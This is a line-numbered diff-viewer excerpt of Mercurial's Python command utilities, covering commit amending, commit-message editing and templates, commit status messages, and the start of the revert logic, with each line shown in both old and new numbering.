2425 # was specified.
2428 # was specified.
2426 matcher = scmutil.match(wctx, pats, opts)
2429 matcher = scmutil.match(wctx, pats, opts)
2427 if (opts.get('addremove')
2430 if (opts.get('addremove')
2428 and scmutil.addremove(repo, matcher, "", opts)):
2431 and scmutil.addremove(repo, matcher, "", opts)):
2429 raise error.Abort(
2432 raise error.Abort(
2430 _("failed to mark all new/missing files as added/removed"))
2433 _("failed to mark all new/missing files as added/removed"))
2431
2434
2432 # Check subrepos. This depends on in-place wctx._status update in
2435 # Check subrepos. This depends on in-place wctx._status update in
2433 # subrepo.precommit(). To minimize the risk of this hack, we do
2436 # subrepo.precommit(). To minimize the risk of this hack, we do
2434 # nothing if .hgsub does not exist.
2437 # nothing if .hgsub does not exist.
2435 if '.hgsub' in wctx or '.hgsub' in old:
2438 if '.hgsub' in wctx or '.hgsub' in old:
2436 subs, commitsubs, newsubstate = subrepoutil.precommit(
2439 subs, commitsubs, newsubstate = subrepoutil.precommit(
2437 ui, wctx, wctx._status, matcher)
2440 ui, wctx, wctx._status, matcher)
2438 # amend should abort if commitsubrepos is enabled
2441 # amend should abort if commitsubrepos is enabled
2439 assert not commitsubs
2442 assert not commitsubs
2440 if subs:
2443 if subs:
2441 subrepoutil.writestate(repo, newsubstate)
2444 subrepoutil.writestate(repo, newsubstate)
2442
2445
2443 ms = mergemod.mergestate.read(repo)
2446 ms = mergemod.mergestate.read(repo)
2444 mergeutil.checkunresolved(ms)
2447 mergeutil.checkunresolved(ms)
2445
2448
2446 filestoamend = set(f for f in wctx.files() if matcher(f))
2449 filestoamend = set(f for f in wctx.files() if matcher(f))
2447
2450
2448 changes = (len(filestoamend) > 0)
2451 changes = (len(filestoamend) > 0)
2449 if changes:
2452 if changes:
2450 # Recompute copies (avoid recording a -> b -> a)
2453 # Recompute copies (avoid recording a -> b -> a)
2451 copied = copies.pathcopies(base, wctx, matcher)
2454 copied = copies.pathcopies(base, wctx, matcher)
2452 if old.p2:
2455 if old.p2:
2453 copied.update(copies.pathcopies(old.p2(), wctx, matcher))
2456 copied.update(copies.pathcopies(old.p2(), wctx, matcher))
2454
2457
2455 # Prune files which were reverted by the updates: if old
2458 # Prune files which were reverted by the updates: if old
2456 # introduced file X and the file was renamed in the working
2459 # introduced file X and the file was renamed in the working
2457 # copy, then those two files are the same and
2460 # copy, then those two files are the same and
2458 # we can discard X from our list of files. Likewise if X
2461 # we can discard X from our list of files. Likewise if X
2459 # was removed, it's no longer relevant. If X is missing (aka
2462 # was removed, it's no longer relevant. If X is missing (aka
2460 # deleted), old X must be preserved.
2463 # deleted), old X must be preserved.
2461 files.update(filestoamend)
2464 files.update(filestoamend)
2462 files = [f for f in files if (not samefile(f, wctx, base)
2465 files = [f for f in files if (not samefile(f, wctx, base)
2463 or f in wctx.deleted())]
2466 or f in wctx.deleted())]
2464
2467
2465 def filectxfn(repo, ctx_, path):
2468 def filectxfn(repo, ctx_, path):
2466 try:
2469 try:
2467 # If the file being considered is not amongst the files
2470 # If the file being considered is not amongst the files
2468 # to be amended, we should return the file context from the
2471 # to be amended, we should return the file context from the
2469 # old changeset. This avoids issues when only some files in
2472 # old changeset. This avoids issues when only some files in
2470 # the working copy are being amended but there are also
2473 # the working copy are being amended but there are also
2471 # changes to other files from the old changeset.
2474 # changes to other files from the old changeset.
2472 if path not in filestoamend:
2475 if path not in filestoamend:
2473 return old.filectx(path)
2476 return old.filectx(path)
2474
2477
2475 # Return None for removed files.
2478 # Return None for removed files.
2476 if path in wctx.removed():
2479 if path in wctx.removed():
2477 return None
2480 return None
2478
2481
2479 fctx = wctx[path]
2482 fctx = wctx[path]
2480 flags = fctx.flags()
2483 flags = fctx.flags()
2481 mctx = context.memfilectx(repo, ctx_,
2484 mctx = context.memfilectx(repo, ctx_,
2482 fctx.path(), fctx.data(),
2485 fctx.path(), fctx.data(),
2483 islink='l' in flags,
2486 islink='l' in flags,
2484 isexec='x' in flags,
2487 isexec='x' in flags,
2485 copied=copied.get(path))
2488 copied=copied.get(path))
2486 return mctx
2489 return mctx
2487 except KeyError:
2490 except KeyError:
2488 return None
2491 return None
2489 else:
2492 else:
2490 ui.note(_('copying changeset %s to %s\n') % (old, base))
2493 ui.note(_('copying changeset %s to %s\n') % (old, base))
2491
2494
2492 # Use version of files as in the old cset
2495 # Use version of files as in the old cset
2493 def filectxfn(repo, ctx_, path):
2496 def filectxfn(repo, ctx_, path):
2494 try:
2497 try:
2495 return old.filectx(path)
2498 return old.filectx(path)
2496 except KeyError:
2499 except KeyError:
2497 return None
2500 return None
2498
2501
2499 # See if we got a message from -m or -l, if not, open the editor with
2502 # See if we got a message from -m or -l, if not, open the editor with
2500 # the message of the changeset to amend.
2503 # the message of the changeset to amend.
2501 message = logmessage(ui, opts)
2504 message = logmessage(ui, opts)
2502
2505
2503 editform = mergeeditform(old, 'commit.amend')
2506 editform = mergeeditform(old, 'commit.amend')
2504 editor = getcommiteditor(editform=editform,
2507 editor = getcommiteditor(editform=editform,
2505 **pycompat.strkwargs(opts))
2508 **pycompat.strkwargs(opts))
2506
2509
2507 if not message:
2510 if not message:
2508 editor = getcommiteditor(edit=True, editform=editform)
2511 editor = getcommiteditor(edit=True, editform=editform)
2509 message = old.description()
2512 message = old.description()
2510
2513
2511 pureextra = extra.copy()
2514 pureextra = extra.copy()
2512 extra['amend_source'] = old.hex()
2515 extra['amend_source'] = old.hex()
2513
2516
2514 new = context.memctx(repo,
2517 new = context.memctx(repo,
2515 parents=[base.node(), old.p2().node()],
2518 parents=[base.node(), old.p2().node()],
2516 text=message,
2519 text=message,
2517 files=files,
2520 files=files,
2518 filectxfn=filectxfn,
2521 filectxfn=filectxfn,
2519 user=user,
2522 user=user,
2520 date=date,
2523 date=date,
2521 extra=extra,
2524 extra=extra,
2522 editor=editor)
2525 editor=editor)
2523
2526
2524 newdesc = changelog.stripdesc(new.description())
2527 newdesc = changelog.stripdesc(new.description())
2525 if ((not changes)
2528 if ((not changes)
2526 and newdesc == old.description()
2529 and newdesc == old.description()
2527 and user == old.user()
2530 and user == old.user()
2528 and date == old.date()
2531 and date == old.date()
2529 and pureextra == old.extra()):
2532 and pureextra == old.extra()):
2530 # nothing changed. continuing here would create a new node
2533 # nothing changed. continuing here would create a new node
2531 # anyway because of the amend_source noise.
2534 # anyway because of the amend_source noise.
2532 #
2535 #
2533 # This not what we expect from amend.
2536 # This not what we expect from amend.
2534 return old.node()
2537 return old.node()
2535
2538
2536 commitphase = None
2539 commitphase = None
2537 if opts.get('secret'):
2540 if opts.get('secret'):
2538 commitphase = phases.secret
2541 commitphase = phases.secret
2539 newid = repo.commitctx(new)
2542 newid = repo.commitctx(new)
2540
2543
2541 # Reroute the working copy parent to the new changeset
2544 # Reroute the working copy parent to the new changeset
2542 repo.setparents(newid, nullid)
2545 repo.setparents(newid, nullid)
2543 mapping = {old.node(): (newid,)}
2546 mapping = {old.node(): (newid,)}
2544 obsmetadata = None
2547 obsmetadata = None
2545 if opts.get('note'):
2548 if opts.get('note'):
2546 obsmetadata = {'note': opts['note']}
2549 obsmetadata = {'note': opts['note']}
2547 scmutil.cleanupnodes(repo, mapping, 'amend', metadata=obsmetadata,
2550 scmutil.cleanupnodes(repo, mapping, 'amend', metadata=obsmetadata,
2548 fixphase=True, targetphase=commitphase)
2551 fixphase=True, targetphase=commitphase)
2549
2552
2550 # Fixing the dirstate because localrepo.commitctx does not update
2553 # Fixing the dirstate because localrepo.commitctx does not update
2551 # it. This is rather convenient because we did not need to update
2554 # it. This is rather convenient because we did not need to update
2552 # the dirstate for all the files in the new commit which commitctx
2555 # the dirstate for all the files in the new commit which commitctx
2553 # could have done if it updated the dirstate. Now, we can
2556 # could have done if it updated the dirstate. Now, we can
2554 # selectively update the dirstate only for the amended files.
2557 # selectively update the dirstate only for the amended files.
2555 dirstate = repo.dirstate
2558 dirstate = repo.dirstate
2556
2559
2557 # Update the state of the files which were added and
2560 # Update the state of the files which were added and
2558 # and modified in the amend to "normal" in the dirstate.
2561 # and modified in the amend to "normal" in the dirstate.
2559 normalfiles = set(wctx.modified() + wctx.added()) & filestoamend
2562 normalfiles = set(wctx.modified() + wctx.added()) & filestoamend
2560 for f in normalfiles:
2563 for f in normalfiles:
2561 dirstate.normal(f)
2564 dirstate.normal(f)
2562
2565
2563 # Update the state of files which were removed in the amend
2566 # Update the state of files which were removed in the amend
2564 # to "removed" in the dirstate.
2567 # to "removed" in the dirstate.
2565 removedfiles = set(wctx.removed()) & filestoamend
2568 removedfiles = set(wctx.removed()) & filestoamend
2566 for f in removedfiles:
2569 for f in removedfiles:
2567 dirstate.drop(f)
2570 dirstate.drop(f)
2568
2571
2569 return newid
2572 return newid
2570
2573
2571 def commiteditor(repo, ctx, subs, editform=''):
2574 def commiteditor(repo, ctx, subs, editform=''):
2572 if ctx.description():
2575 if ctx.description():
2573 return ctx.description()
2576 return ctx.description()
2574 return commitforceeditor(repo, ctx, subs, editform=editform,
2577 return commitforceeditor(repo, ctx, subs, editform=editform,
2575 unchangedmessagedetection=True)
2578 unchangedmessagedetection=True)
2576
2579
2577 def commitforceeditor(repo, ctx, subs, finishdesc=None, extramsg=None,
2580 def commitforceeditor(repo, ctx, subs, finishdesc=None, extramsg=None,
2578 editform='', unchangedmessagedetection=False):
2581 editform='', unchangedmessagedetection=False):
2579 if not extramsg:
2582 if not extramsg:
2580 extramsg = _("Leave message empty to abort commit.")
2583 extramsg = _("Leave message empty to abort commit.")
2581
2584
2582 forms = [e for e in editform.split('.') if e]
2585 forms = [e for e in editform.split('.') if e]
2583 forms.insert(0, 'changeset')
2586 forms.insert(0, 'changeset')
2584 templatetext = None
2587 templatetext = None
2585 while forms:
2588 while forms:
2586 ref = '.'.join(forms)
2589 ref = '.'.join(forms)
2587 if repo.ui.config('committemplate', ref):
2590 if repo.ui.config('committemplate', ref):
2588 templatetext = committext = buildcommittemplate(
2591 templatetext = committext = buildcommittemplate(
2589 repo, ctx, subs, extramsg, ref)
2592 repo, ctx, subs, extramsg, ref)
2590 break
2593 break
2591 forms.pop()
2594 forms.pop()
2592 else:
2595 else:
2593 committext = buildcommittext(repo, ctx, subs, extramsg)
2596 committext = buildcommittext(repo, ctx, subs, extramsg)
2594
2597
2595 # run editor in the repository root
2598 # run editor in the repository root
2596 olddir = pycompat.getcwd()
2599 olddir = pycompat.getcwd()
2597 os.chdir(repo.root)
2600 os.chdir(repo.root)
2598
2601
2599 # make in-memory changes visible to external process
2602 # make in-memory changes visible to external process
2600 tr = repo.currenttransaction()
2603 tr = repo.currenttransaction()
2601 repo.dirstate.write(tr)
2604 repo.dirstate.write(tr)
2602 pending = tr and tr.writepending() and repo.root
2605 pending = tr and tr.writepending() and repo.root
2603
2606
2604 editortext = repo.ui.edit(committext, ctx.user(), ctx.extra(),
2607 editortext = repo.ui.edit(committext, ctx.user(), ctx.extra(),
2605 editform=editform, pending=pending,
2608 editform=editform, pending=pending,
2606 repopath=repo.path, action='commit')
2609 repopath=repo.path, action='commit')
2607 text = editortext
2610 text = editortext
2608
2611
2609 # strip away anything below this special string (used for editors that want
2612 # strip away anything below this special string (used for editors that want
2610 # to display the diff)
2613 # to display the diff)
2611 stripbelow = re.search(_linebelow, text, flags=re.MULTILINE)
2614 stripbelow = re.search(_linebelow, text, flags=re.MULTILINE)
2612 if stripbelow:
2615 if stripbelow:
2613 text = text[:stripbelow.start()]
2616 text = text[:stripbelow.start()]
2614
2617
2615 text = re.sub("(?m)^HG:.*(\n|$)", "", text)
2618 text = re.sub("(?m)^HG:.*(\n|$)", "", text)
2616 os.chdir(olddir)
2619 os.chdir(olddir)
2617
2620
2618 if finishdesc:
2621 if finishdesc:
2619 text = finishdesc(text)
2622 text = finishdesc(text)
2620 if not text.strip():
2623 if not text.strip():
2621 raise error.Abort(_("empty commit message"))
2624 raise error.Abort(_("empty commit message"))
2622 if unchangedmessagedetection and editortext == templatetext:
2625 if unchangedmessagedetection and editortext == templatetext:
2623 raise error.Abort(_("commit message unchanged"))
2626 raise error.Abort(_("commit message unchanged"))
2624
2627
2625 return text
2628 return text
2626
2629
2627 def buildcommittemplate(repo, ctx, subs, extramsg, ref):
2630 def buildcommittemplate(repo, ctx, subs, extramsg, ref):
2628 ui = repo.ui
2631 ui = repo.ui
2629 spec = formatter.templatespec(ref, None, None)
2632 spec = formatter.templatespec(ref, None, None)
2630 t = logcmdutil.changesettemplater(ui, repo, spec)
2633 t = logcmdutil.changesettemplater(ui, repo, spec)
2631 t.t.cache.update((k, templater.unquotestring(v))
2634 t.t.cache.update((k, templater.unquotestring(v))
2632 for k, v in repo.ui.configitems('committemplate'))
2635 for k, v in repo.ui.configitems('committemplate'))
2633
2636
2634 if not extramsg:
2637 if not extramsg:
2635 extramsg = '' # ensure that extramsg is string
2638 extramsg = '' # ensure that extramsg is string
2636
2639
2637 ui.pushbuffer()
2640 ui.pushbuffer()
2638 t.show(ctx, extramsg=extramsg)
2641 t.show(ctx, extramsg=extramsg)
2639 return ui.popbuffer()
2642 return ui.popbuffer()
2640
2643
2641 def hgprefix(msg):
2644 def hgprefix(msg):
2642 return "\n".join(["HG: %s" % a for a in msg.split("\n") if a])
2645 return "\n".join(["HG: %s" % a for a in msg.split("\n") if a])
2643
2646
2644 def buildcommittext(repo, ctx, subs, extramsg):
2647 def buildcommittext(repo, ctx, subs, extramsg):
2645 edittext = []
2648 edittext = []
2646 modified, added, removed = ctx.modified(), ctx.added(), ctx.removed()
2649 modified, added, removed = ctx.modified(), ctx.added(), ctx.removed()
2647 if ctx.description():
2650 if ctx.description():
2648 edittext.append(ctx.description())
2651 edittext.append(ctx.description())
2649 edittext.append("")
2652 edittext.append("")
2650 edittext.append("") # Empty line between message and comments.
2653 edittext.append("") # Empty line between message and comments.
2651 edittext.append(hgprefix(_("Enter commit message."
2654 edittext.append(hgprefix(_("Enter commit message."
2652 " Lines beginning with 'HG:' are removed.")))
2655 " Lines beginning with 'HG:' are removed.")))
2653 edittext.append(hgprefix(extramsg))
2656 edittext.append(hgprefix(extramsg))
2654 edittext.append("HG: --")
2657 edittext.append("HG: --")
2655 edittext.append(hgprefix(_("user: %s") % ctx.user()))
2658 edittext.append(hgprefix(_("user: %s") % ctx.user()))
2656 if ctx.p2():
2659 if ctx.p2():
2657 edittext.append(hgprefix(_("branch merge")))
2660 edittext.append(hgprefix(_("branch merge")))
2658 if ctx.branch():
2661 if ctx.branch():
2659 edittext.append(hgprefix(_("branch '%s'") % ctx.branch()))
2662 edittext.append(hgprefix(_("branch '%s'") % ctx.branch()))
2660 if bookmarks.isactivewdirparent(repo):
2663 if bookmarks.isactivewdirparent(repo):
2661 edittext.append(hgprefix(_("bookmark '%s'") % repo._activebookmark))
2664 edittext.append(hgprefix(_("bookmark '%s'") % repo._activebookmark))
2662 edittext.extend([hgprefix(_("subrepo %s") % s) for s in subs])
2665 edittext.extend([hgprefix(_("subrepo %s") % s) for s in subs])
2663 edittext.extend([hgprefix(_("added %s") % f) for f in added])
2666 edittext.extend([hgprefix(_("added %s") % f) for f in added])
2664 edittext.extend([hgprefix(_("changed %s") % f) for f in modified])
2667 edittext.extend([hgprefix(_("changed %s") % f) for f in modified])
2665 edittext.extend([hgprefix(_("removed %s") % f) for f in removed])
2668 edittext.extend([hgprefix(_("removed %s") % f) for f in removed])
2666 if not added and not modified and not removed:
2669 if not added and not modified and not removed:
2667 edittext.append(hgprefix(_("no files changed")))
2670 edittext.append(hgprefix(_("no files changed")))
2668 edittext.append("")
2671 edittext.append("")
2669
2672
2670 return "\n".join(edittext)
2673 return "\n".join(edittext)
2671
2674
2672 def commitstatus(repo, node, branch, bheads=None, opts=None):
2675 def commitstatus(repo, node, branch, bheads=None, opts=None):
2673 if opts is None:
2676 if opts is None:
2674 opts = {}
2677 opts = {}
2675 ctx = repo[node]
2678 ctx = repo[node]
2676 parents = ctx.parents()
2679 parents = ctx.parents()
2677
2680
2678 if (not opts.get('amend') and bheads and node not in bheads and not
2681 if (not opts.get('amend') and bheads and node not in bheads and not
2679 [x for x in parents if x.node() in bheads and x.branch() == branch]):
2682 [x for x in parents if x.node() in bheads and x.branch() == branch]):
2680 repo.ui.status(_('created new head\n'))
2683 repo.ui.status(_('created new head\n'))
2681 # The message is not printed for initial roots. For the other
2684 # The message is not printed for initial roots. For the other
2682 # changesets, it is printed in the following situations:
2685 # changesets, it is printed in the following situations:
2683 #
2686 #
2684 # Par column: for the 2 parents with ...
2687 # Par column: for the 2 parents with ...
2685 # N: null or no parent
2688 # N: null or no parent
2686 # B: parent is on another named branch
2689 # B: parent is on another named branch
2687 # C: parent is a regular non head changeset
2690 # C: parent is a regular non head changeset
2688 # H: parent was a branch head of the current branch
2691 # H: parent was a branch head of the current branch
2689 # Msg column: whether we print "created new head" message
2692 # Msg column: whether we print "created new head" message
2690 # In the following, it is assumed that there already exists some
2693 # In the following, it is assumed that there already exists some
2691 # initial branch heads of the current branch, otherwise nothing is
2694 # initial branch heads of the current branch, otherwise nothing is
2692 # printed anyway.
2695 # printed anyway.
2693 #
2696 #
2694 # Par Msg Comment
2697 # Par Msg Comment
2695 # N N y additional topo root
2698 # N N y additional topo root
2696 #
2699 #
2697 # B N y additional branch root
2700 # B N y additional branch root
2698 # C N y additional topo head
2701 # C N y additional topo head
2699 # H N n usual case
2702 # H N n usual case
2700 #
2703 #
2701 # B B y weird additional branch root
2704 # B B y weird additional branch root
2702 # C B y branch merge
2705 # C B y branch merge
2703 # H B n merge with named branch
2706 # H B n merge with named branch
2704 #
2707 #
2705 # C C y additional head from merge
2708 # C C y additional head from merge
2706 # C H n merge with a head
2709 # C H n merge with a head
2707 #
2710 #
2708 # H H n head merge: head count decreases
2711 # H H n head merge: head count decreases
2709
2712
2710 if not opts.get('close_branch'):
2713 if not opts.get('close_branch'):
2711 for r in parents:
2714 for r in parents:
2712 if r.closesbranch() and r.branch() == branch:
2715 if r.closesbranch() and r.branch() == branch:
2713 repo.ui.status(_('reopening closed branch head %d\n') % r.rev())
2716 repo.ui.status(_('reopening closed branch head %d\n') % r.rev())
2714
2717
2715 if repo.ui.debugflag:
2718 if repo.ui.debugflag:
2716 repo.ui.write(_('committed changeset %d:%s\n') % (ctx.rev(), ctx.hex()))
2719 repo.ui.write(_('committed changeset %d:%s\n') % (ctx.rev(), ctx.hex()))
2717 elif repo.ui.verbose:
2720 elif repo.ui.verbose:
2718 repo.ui.write(_('committed changeset %d:%s\n') % (ctx.rev(), ctx))
2721 repo.ui.write(_('committed changeset %d:%s\n') % (ctx.rev(), ctx))
2719
2722
2720 def postcommitstatus(repo, pats, opts):
2723 def postcommitstatus(repo, pats, opts):
2721 return repo.status(match=scmutil.match(repo[None], pats, opts))
2724 return repo.status(match=scmutil.match(repo[None], pats, opts))
2722
2725
2723 def revert(ui, repo, ctx, parents, *pats, **opts):
2726 def revert(ui, repo, ctx, parents, *pats, **opts):
2724 opts = pycompat.byteskwargs(opts)
2727 opts = pycompat.byteskwargs(opts)
2725 parent, p2 = parents
2728 parent, p2 = parents
2726 node = ctx.node()
2729 node = ctx.node()
2727
2730
2728 mf = ctx.manifest()
2731 mf = ctx.manifest()
2729 if node == p2:
2732 if node == p2:
2730 parent = p2
2733 parent = p2
2731
2734
2732 # need all matching names in dirstate and manifest of target rev,
2735 # need all matching names in dirstate and manifest of target rev,
2733 # so have to walk both. do not print errors if files exist in one
2736 # so have to walk both. do not print errors if files exist in one
2734 # but not other. in both cases, filesets should be evaluated against
2737 # but not other. in both cases, filesets should be evaluated against
2735 # workingctx to get consistent result (issue4497). this means 'set:**'
2738 # workingctx to get consistent result (issue4497). this means 'set:**'
2736 # cannot be used to select missing files from target rev.
2739 # cannot be used to select missing files from target rev.
2737
2740
2738 # `names` is a mapping for all elements in working copy and target revision
2741 # `names` is a mapping for all elements in working copy and target revision
2739 # The mapping is in the form:
2742 # The mapping is in the form:
2740 # <asb path in repo> -> (<path from CWD>, <exactly specified by matcher?>)
2743 # <asb path in repo> -> (<path from CWD>, <exactly specified by matcher?>)
2741 names = {}
2744 names = {}
2742
2745
2743 with repo.wlock():
2746 with repo.wlock():
2744 ## filling of the `names` mapping
2747 ## filling of the `names` mapping
2745 # walk dirstate to fill `names`
2748 # walk dirstate to fill `names`
2746
2749
2747 interactive = opts.get('interactive', False)
2750 interactive = opts.get('interactive', False)
2748 wctx = repo[None]
2751 wctx = repo[None]
2749 m = scmutil.match(wctx, pats, opts)
2752 m = scmutil.match(wctx, pats, opts)
2750
2753
2751 # we'll need this later
2754 # we'll need this later
2752 targetsubs = sorted(s for s in wctx.substate if m(s))
2755 targetsubs = sorted(s for s in wctx.substate if m(s))
2753
2756
2754 if not m.always():
2757 if not m.always():
2755 matcher = matchmod.badmatch(m, lambda x, y: False)
2758 matcher = matchmod.badmatch(m, lambda x, y: False)
2756 for abs in wctx.walk(matcher):
2759 for abs in wctx.walk(matcher):
2757 names[abs] = m.rel(abs), m.exact(abs)
2760 names[abs] = m.rel(abs), m.exact(abs)
2758
2761
2759 # walk target manifest to fill `names`
2762 # walk target manifest to fill `names`
2760
2763
2761 def badfn(path, msg):
2764 def badfn(path, msg):
2762 if path in names:
2765 if path in names:
2763 return
2766 return
2764 if path in ctx.substate:
2767 if path in ctx.substate:
2765 return
2768 return
2766 path_ = path + '/'
2769 path_ = path + '/'
2767 for f in names:
2770 for f in names:
2768 if f.startswith(path_):
2771 if f.startswith(path_):
2769 return
2772 return
2770 ui.warn("%s: %s\n" % (m.rel(path), msg))
2773 ui.warn("%s: %s\n" % (m.rel(path), msg))
2771
2774
2772 for abs in ctx.walk(matchmod.badmatch(m, badfn)):
2775 for abs in ctx.walk(matchmod.badmatch(m, badfn)):
2773 if abs not in names:
2776 if abs not in names:
2774 names[abs] = m.rel(abs), m.exact(abs)
2777 names[abs] = m.rel(abs), m.exact(abs)
2775
2778
2776 # Find status of all file in `names`.
2779 # Find status of all file in `names`.
2777 m = scmutil.matchfiles(repo, names)
2780 m = scmutil.matchfiles(repo, names)
2778
2781
2779 changes = repo.status(node1=node, match=m,
2782 changes = repo.status(node1=node, match=m,
2780 unknown=True, ignored=True, clean=True)
2783 unknown=True, ignored=True, clean=True)
2781 else:
2784 else:
2782 changes = repo.status(node1=node, match=m)
2785 changes = repo.status(node1=node, match=m)
2783 for kind in changes:
2786 for kind in changes:
2784 for abs in kind:
2787 for abs in kind:
2785 names[abs] = m.rel(abs), m.exact(abs)
2788 names[abs] = m.rel(abs), m.exact(abs)
2786
2789
2787 m = scmutil.matchfiles(repo, names)
2790 m = scmutil.matchfiles(repo, names)
2788
2791
2789 modified = set(changes.modified)
2792 modified = set(changes.modified)
2790 added = set(changes.added)
2793 added = set(changes.added)
2791 removed = set(changes.removed)
2794 removed = set(changes.removed)
2792 _deleted = set(changes.deleted)
2795 _deleted = set(changes.deleted)
2793 unknown = set(changes.unknown)
2796 unknown = set(changes.unknown)
2794 unknown.update(changes.ignored)
2797 unknown.update(changes.ignored)
2795 clean = set(changes.clean)
2798 clean = set(changes.clean)
2796 modadded = set()
2799 modadded = set()
2797
2800
2798 # We need to account for the state of the file in the dirstate,
2801 # We need to account for the state of the file in the dirstate,
2799 # even when we revert against something else than parent. This will
2802 # even when we revert against something else than parent. This will
2800 # slightly alter the behavior of revert (doing back up or not, delete
2803 # slightly alter the behavior of revert (doing back up or not, delete
2801 # or just forget etc).
2804 # or just forget etc).
2802 if parent == node:
2805 if parent == node:
2803 dsmodified = modified
2806 dsmodified = modified
2804 dsadded = added
2807 dsadded = added
2805 dsremoved = removed
2808 dsremoved = removed
2806 # store all local modifications, useful later for rename detection
2809 # store all local modifications, useful later for rename detection
2807 localchanges = dsmodified | dsadded
2810 localchanges = dsmodified | dsadded
2808 modified, added, removed = set(), set(), set()
2811 modified, added, removed = set(), set(), set()
2809 else:
2812 else:
2810 changes = repo.status(node1=parent, match=m)
2813 changes = repo.status(node1=parent, match=m)
2811 dsmodified = set(changes.modified)
2814 dsmodified = set(changes.modified)
2812 dsadded = set(changes.added)
2815 dsadded = set(changes.added)
2813 dsremoved = set(changes.removed)
2816 dsremoved = set(changes.removed)
2814 # store all local modifications, useful later for rename detection
2817 # store all local modifications, useful later for rename detection
2815 localchanges = dsmodified | dsadded
2818 localchanges = dsmodified | dsadded
2816
2819
2817 # only take into account for removes between wc and target
2820 # only take into account for removes between wc and target
2818 clean |= dsremoved - removed
2821 clean |= dsremoved - removed
2819 dsremoved &= removed
2822 dsremoved &= removed
2820 # distinct between dirstate remove and other
2823 # distinct between dirstate remove and other
2821 removed -= dsremoved
2824 removed -= dsremoved
2822
2825
2823 modadded = added & dsmodified
2826 modadded = added & dsmodified
2824 added -= modadded
2827 added -= modadded
2825
2828
2826 # tell newly modified apart.
2829 # tell newly modified apart.
2827 dsmodified &= modified
2830 dsmodified &= modified
2828 dsmodified |= modified & dsadded # dirstate added may need backup
2831 dsmodified |= modified & dsadded # dirstate added may need backup
2829 modified -= dsmodified
2832 modified -= dsmodified
2830
2833
2831 # We need to wait for some post-processing to update this set
2834 # We need to wait for some post-processing to update this set
2832 # before making the distinction. The dirstate will be used for
2835 # before making the distinction. The dirstate will be used for
2833 # that purpose.
2836 # that purpose.
2834 dsadded = added
2837 dsadded = added
2835
2838
2836 # in case of merge, files that are actually added can be reported as
2839 # in case of merge, files that are actually added can be reported as
2837 # modified, we need to post process the result
2840 # modified, we need to post process the result
2838 if p2 != nullid:
2841 if p2 != nullid:
2839 mergeadd = set(dsmodified)
2842 mergeadd = set(dsmodified)
2840 for path in dsmodified:
2843 for path in dsmodified:
2841 if path in mf:
2844 if path in mf:
2842 mergeadd.remove(path)
2845 mergeadd.remove(path)
2843 dsadded |= mergeadd
2846 dsadded |= mergeadd
2844 dsmodified -= mergeadd
2847 dsmodified -= mergeadd
2845
2848
2846 # if f is a rename, update `names` to also revert the source
2849 # if f is a rename, update `names` to also revert the source
2847 cwd = repo.getcwd()
2850 cwd = repo.getcwd()
2848 for f in localchanges:
2851 for f in localchanges:
2849 src = repo.dirstate.copied(f)
2852 src = repo.dirstate.copied(f)
2850 # XXX should we check for rename down to target node?
2853 # XXX should we check for rename down to target node?
2851 if src and src not in names and repo.dirstate[src] == 'r':
2854 if src and src not in names and repo.dirstate[src] == 'r':
2852 dsremoved.add(src)
2855 dsremoved.add(src)
2853 names[src] = (repo.pathto(src, cwd), True)
2856 names[src] = (repo.pathto(src, cwd), True)
2854
2857
2855 # determine the exact nature of the deleted changesets
2858 # determine the exact nature of the deleted changesets
2856 deladded = set(_deleted)
2859 deladded = set(_deleted)
2857 for path in _deleted:
2860 for path in _deleted:
2858 if path in mf:
2861 if path in mf:
2859 deladded.remove(path)
2862 deladded.remove(path)
2860 deleted = _deleted - deladded
2863 deleted = _deleted - deladded
2861
2864
2862 # distinguish between file to forget and the other
2865 # distinguish between file to forget and the other
2863 added = set()
2866 added = set()
2864 for abs in dsadded:
2867 for abs in dsadded:
2865 if repo.dirstate[abs] != 'a':
2868 if repo.dirstate[abs] != 'a':
2866 added.add(abs)
2869 added.add(abs)
2867 dsadded -= added
2870 dsadded -= added
2868
2871
2869 for abs in deladded:
2872 for abs in deladded:
2870 if repo.dirstate[abs] == 'a':
2873 if repo.dirstate[abs] == 'a':
2871 dsadded.add(abs)
2874 dsadded.add(abs)
2872 deladded -= dsadded
2875 deladded -= dsadded
2873
2876
2874 # For files marked as removed, we check if an unknown file is present at
2877 # For files marked as removed, we check if an unknown file is present at
2875 # the same path. If a such file exists it may need to be backed up.
2878 # the same path. If a such file exists it may need to be backed up.
2876 # Making the distinction at this stage helps have simpler backup
2879 # Making the distinction at this stage helps have simpler backup
2877 # logic.
2880 # logic.
2878 removunk = set()
2881 removunk = set()
2879 for abs in removed:
2882 for abs in removed:
2880 target = repo.wjoin(abs)
2883 target = repo.wjoin(abs)
2881 if os.path.lexists(target):
2884 if os.path.lexists(target):
2882 removunk.add(abs)
2885 removunk.add(abs)
2883 removed -= removunk
2886 removed -= removunk
2884
2887
2885 dsremovunk = set()
2888 dsremovunk = set()
2886 for abs in dsremoved:
2889 for abs in dsremoved:
2887 target = repo.wjoin(abs)
2890 target = repo.wjoin(abs)
2888 if os.path.lexists(target):
2891 if os.path.lexists(target):
2889 dsremovunk.add(abs)
2892 dsremovunk.add(abs)
2890 dsremoved -= dsremovunk
2893 dsremoved -= dsremovunk
2891
2894
2892 # action to be actually performed by revert
2895 # action to be actually performed by revert
2893 # (<list of file>, message>) tuple
2896 # (<list of file>, message>) tuple
2894 actions = {'revert': ([], _('reverting %s\n')),
2897 actions = {'revert': ([], _('reverting %s\n')),
2895 'add': ([], _('adding %s\n')),
2898 'add': ([], _('adding %s\n')),
2896 'remove': ([], _('removing %s\n')),
2899 'remove': ([], _('removing %s\n')),
2897 'drop': ([], _('removing %s\n')),
2900 'drop': ([], _('removing %s\n')),
2898 'forget': ([], _('forgetting %s\n')),
2901 'forget': ([], _('forgetting %s\n')),
2899 'undelete': ([], _('undeleting %s\n')),
2902 'undelete': ([], _('undeleting %s\n')),
2900 'noop': (None, _('no changes needed to %s\n')),
2903 'noop': (None, _('no changes needed to %s\n')),
2901 'unknown': (None, _('file not managed: %s\n')),
2904 'unknown': (None, _('file not managed: %s\n')),
2902 }
2905 }
2903
2906
2904 # "constant" that convey the backup strategy.
2907 # "constant" that convey the backup strategy.
2905 # All set to `discard` if `no-backup` is set do avoid checking
2908 # All set to `discard` if `no-backup` is set do avoid checking
2906 # no_backup lower in the code.
2909 # no_backup lower in the code.
2907 # These values are ordered for comparison purposes
2910 # These values are ordered for comparison purposes
2908 backupinteractive = 3 # do backup if interactively modified
2911 backupinteractive = 3 # do backup if interactively modified
2909 backup = 2 # unconditionally do backup
2912 backup = 2 # unconditionally do backup
